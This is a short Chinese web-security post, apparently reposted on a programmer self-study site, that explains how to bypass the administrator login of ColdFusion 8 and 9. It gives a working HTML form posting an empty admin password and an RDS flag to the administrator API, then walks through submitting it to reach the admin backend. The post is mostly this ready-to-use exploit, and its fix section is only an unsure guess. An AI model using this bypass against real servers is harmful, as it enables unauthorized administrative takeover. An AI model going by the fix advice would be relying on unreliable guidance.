coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台
这是登录页面
然后本地写一个表单提交页面
<form action="http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=login" method="post"> <input type="hidden" name="adminpassword" value=""> <input type="hidden" name="rdsPasswordAllowed" value="1"> <input type="submit"> </form>
保存为html运行
点击"提交查询"
然后再次访问登录页面,此时已进入后台
此 漏洞 使用于coldfusion8、9版本
修复方案: 修复方案是添加过滤方式吧,我也不清楚
查看更多关于绕过coldfusion8登录界面登录后台 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14974